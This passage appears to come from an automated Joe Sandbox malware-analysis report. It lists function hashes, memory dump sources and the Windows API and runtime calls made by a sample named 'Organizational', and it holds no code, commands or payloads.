                                                    • Opcode Fuzzy Hash: f72010664a7d54f574d98837c2a8dc4a19fc333ccfabe97b8c3ede22d665bf9d
                                                    • Instruction Fuzzy Hash: BE218171A002989BCB41DF94CC49BEE7BF8AF49314F00405AE404A7281DFB95A8DFFA1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7798645014bb075ce37a7bde0552db7ee8e7949c696d4e3d67bc0da45e7a6be9
                                                    • Instruction ID: 2d0f278bd58d1b159febab2dd72e3b265b21841d4aa77b5750921a3d6b414969
                                                    • Opcode Fuzzy Hash: 7798645014bb075ce37a7bde0552db7ee8e7949c696d4e3d67bc0da45e7a6be9
                                                    • Instruction Fuzzy Hash: 39F14AB1A083049FC714DF28C884A6ABBE5FF88314F14892DF9999B351DB35E945CF82
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F059F9
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F05A9E
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F05ABB
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: c924fdd742f38faf8d1005c688832ec0712221232303fa76273b8e343d79cd56
                                                    • Instruction ID: f92d78ca86e988a56f5f4f58b7073d409f1083dc8d488177eb80cac5df11df61
                                                    • Opcode Fuzzy Hash: c924fdd742f38faf8d1005c688832ec0712221232303fa76273b8e343d79cd56
                                                    • Instruction Fuzzy Hash: CC3184B0A057058FD720DF74D8C4697BBE4FB48714F000A2EF69A87291D7B5A944EF51
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1A39B: __NMSG_WRITE.LIBCMT ref: 00F1A3C2
                                                      • Part of subcall function 00F1A39B: __NMSG_WRITE.LIBCMT ref: 00F1A3CC
                                                    • __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1A3F8: GetModuleFileNameW.KERNEL32(00000000,00FB53BA,00000104,00000004,00000001,00F11003), ref: 00F1A48A
                                                      • Part of subcall function 00F1A3F8: ___crtMessageBoxW.LIBCMT ref: 00F1A538
                                                      • Part of subcall function 00F132CF: ___crtCorExitProcess.LIBCMT ref: 00F132D5
                                                      • Part of subcall function 00F132CF: ExitProcess.KERNEL32 ref: 00F132DE
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 8b9d4a64a92a1f78c46d1c60e73fdbd23f45dc5d42b07a05a44a74034f927f8e
                                                    • Instruction ID: 24a746994edca21643552682d3a3cab5cdb55754e0e57fe9624d02060ce700dc
                                                    • Opcode Fuzzy Hash: 8b9d4a64a92a1f78c46d1c60e73fdbd23f45dc5d42b07a05a44a74034f927f8e
                                                    • Instruction Fuzzy Hash: B401F532702B06DAE6153774AC42BEE32588F92FB0F940126F8149A1D1DEB88DC17B62
                                                    APIs
                                                    • _free.LIBCMT ref: 00F592D6
                                                      • Part of subcall function 00F12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12F99
                                                      • Part of subcall function 00F12F85: GetLastError.KERNEL32(00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12FAB
                                                    • _free.LIBCMT ref: 00F592E7
                                                    • _free.LIBCMT ref: 00F592F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction ID: c24e82273cbfcc695882e427a48cae0a1c8eb46eb5b91faaa1f7e25c061db126
                                                    • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction Fuzzy Hash: 3FE0C2A1B0C70293CA28A5B97C44ED377EC0F88322F14040DB909D3146CE68E882B078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    APIs
                                                    • _strcat.LIBCMT ref: 00F6E20C
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • _wcscpy.LIBCMT ref: 00F6E29B
                                                    Similarity
                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1012013722-0
                                                    APIs
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3712363035-0
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00F05FEF
                                                      • Part of subcall function 00F1359C: __lock.LIBCMT ref: 00F135A2
                                                      • Part of subcall function 00F1359C: DecodePointer.KERNEL32(00000001,?,00F06004,00F48892), ref: 00F135AE
                                                      • Part of subcall function 00F1359C: EncodePointer.KERNEL32(?,?,00F06004,00F48892), ref: 00F135B9
                                                      • Part of subcall function 00F05F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F05F18
                                                      • Part of subcall function 00F05F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F05F2D
                                                      • Part of subcall function 00F05240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F0526C
                                                      • Part of subcall function 00F05240: IsDebuggerPresent.KERNEL32 ref: 00F0527E
                                                      • Part of subcall function 00F05240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00F052E6
                                                      • Part of subcall function 00F05240: SetCurrentDirectoryW.KERNEL32(?), ref: 00F05366
                                                    • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00F0602F
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00F03E72,?,?,?,00000000), ref: 00F04327
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00F03E72,?,?,?,00000000), ref: 00F40717
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    APIs
                                                      • Part of subcall function 00F1593C: __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1593C: __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1593C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    • std::exception::exception.LIBCMT ref: 00F1101C
                                                    • __CxxThrowException@8.LIBCMT ref: 00F11031
                                                      • Part of subcall function 00F187CB: RaiseException.KERNEL32(?,?,?,00FACAF8,?,?,?,?,?,00F11036,?,00FACAF8,?,00000001), ref: 00F18820
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    APIs
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    APIs
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • __lock_file.LIBCMT ref: 00F1560B
                                                      • Part of subcall function 00F16E3E: __lock.LIBCMT ref: 00F16E61
                                                    • __fclose_nolock.LIBCMT ref: 00F15616
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00F15EB4
                                                    • __ftell_nolock.LIBCMT ref: 00F15EBF
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05AEF
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F05B1F
                                                    Similarity
                                                    • API ID: IconNotifyShell__memset
                                                    • String ID:
                                                    • API String ID: 928536360-0
                                                    Similarity
                                                    • API ID: LoadString$__swprintf
                                                    • String ID:
                                                    • API String ID: 207118244-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                    • Instruction ID: 63ab4cb53a05704ccb58119b5b3a0efa37f02b0e4d8a64868e12f576c85134e2
                                                    • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                    • Instruction Fuzzy Hash: 0931C379A04602DFC724DF18D840A21F7A8FF48320714C56AE98A8F7A5DB30DC81FB80
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00F041B2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 026435dbc5002bc302baf83829c2e697bf02021fb16cea7741f6b756d3acddab
                                                    • Instruction ID: dcfc3064b52114f1c1eb4a6ec02ea6b3af45d9dda0369607afb4b2df93747330
                                                    • Opcode Fuzzy Hash: 026435dbc5002bc302baf83829c2e697bf02021fb16cea7741f6b756d3acddab
                                                    • Instruction Fuzzy Hash: 883170B1A0061AAFCB19CF2CC8806ADB7B1FF54320F148629ED1593750D770BDA0EB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: a240ff76932633db89af50d19c9939a278075f0a82a39b345d2876b7f12cc213
                                                    • Instruction ID: 28ab34b441ea487109d66bbf91f3b4c5650375d15c63d87373d586c3390ec0d2
                                                    • Opcode Fuzzy Hash: a240ff76932633db89af50d19c9939a278075f0a82a39b345d2876b7f12cc213
                                                    • Instruction Fuzzy Hash: DF414A74508355DFDB24DF14C484B2ABBE1BF44318F1989ACE9899B362C336EC85DB52
                                                    APIs
                                                      • Part of subcall function 00F04B29: FreeLibrary.KERNEL32(00000000,?), ref: 00F04B63
                                                      • Part of subcall function 00F1547B: __wfsopen.LIBCMT ref: 00F15486
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F027AF,?,00000001), ref: 00F049F4
                                                      • Part of subcall function 00F04ADE: FreeLibrary.KERNEL32(00000000), ref: 00F04B18
                                                      • Part of subcall function 00F048B0: _memmove.LIBCMT ref: 00F048FA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 6184c93a218f4d06aba9bbe624e5ff36efbf32dc327adbf4984d80a27b514163
                                                    • Instruction ID: 6cf7935571154d087488ed9128434402f2600139299b5881b65a9df6c77576a2
                                                    • Opcode Fuzzy Hash: 6184c93a218f4d06aba9bbe624e5ff36efbf32dc327adbf4984d80a27b514163
                                                    • Instruction Fuzzy Hash: 2C11E772750205ABDB14FF74CD06FAE77A99F40711F108429FA41A61C1EE7CAA14B794
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 3c872586c6a83b49469388addf2ad73797504496c466a495a86d7222f0ad4d8d
                                                    • Instruction ID: 7e0f10b457c48bb52fa1d3099f1d1f3dee6ffe40fc5e1b006182115c6af2f8b8
                                                    • Opcode Fuzzy Hash: 3c872586c6a83b49469388addf2ad73797504496c466a495a86d7222f0ad4d8d
                                                    • Instruction Fuzzy Hash: BE212574908355DFDB54DF14C844B6ABBE0BF88304F05496CFA8A67362D731E849DB92
                                                    APIs
                                                    • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00F03CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00F04276
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: b29281158d0b2f9366187ba7ece13ccfe98660fa4bf785185440ad322499525a
                                                    • Instruction ID: 148b39ae88076ef35759f2292c8d9003a3c4ebde07ab00549da7fa835b5b801f
                                                    • Opcode Fuzzy Hash: b29281158d0b2f9366187ba7ece13ccfe98660fa4bf785185440ad322499525a
                                                    • Instruction Fuzzy Hash: 8A114CB1600B019FD730CF55C980B62B7F5EF88720F10C92DEAAA86A90D770F845EB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                    • Instruction ID: 71da2c6a14da7ebc985c2459d91ed62263df9902e1e876c59786963d16f5d42f
                                                    • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                    • Instruction Fuzzy Hash: 2701D6726017016ED7245B38DC06BA7BB98EB447A0F50852EFA1ACA1D1EB75E490A7A0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                    • Instruction ID: 05c9fd88305d8b1c5af389d25d37a789928be46724bebc5e38181466ea57fd9e
                                                    • Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                    • Instruction Fuzzy Hash: 3B01F9322002156BCB14DF2DCC9196BB7A9EFC6364714853EF90ECB205E631E845C790
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00F64998
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: 919c177a0a0c9e6ddfaefdc4c44d380a07755ceaa355fd83418e09d522ad256a
                                                    • Instruction ID: 690126545169e263c63ce95e50d606b986eda69de99fc2114b2eb040f4c0945e
                                                    • Opcode Fuzzy Hash: 919c177a0a0c9e6ddfaefdc4c44d380a07755ceaa355fd83418e09d522ad256a
                                                    • Instruction Fuzzy Hash: 21F03175608208AF8B14FB65DC46CAF77BCEF49320B004155F9089B2A1DE75BD81EB60
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                    • _memset.LIBCMT ref: 00F57CB4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw_memsetstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 525207782-0
                                                    • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                    • Instruction ID: 3c7e497da9a615dd15fd1f5694c238f748a63110281b74e1e4a1a6188f02c94d
                                                    • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                    • Instruction Fuzzy Hash: C601FB756042049FD321EF5CD942F45BBE1EF5D310F258459F5888B392DB76E881EB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _fseek
                                                    • String ID:
                                                    • API String ID: 2937370855-0
                                                    • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction ID: 79d197bba019f81789f47061d06231f202239bfc235a6fc8fbd1ff5e7995169e
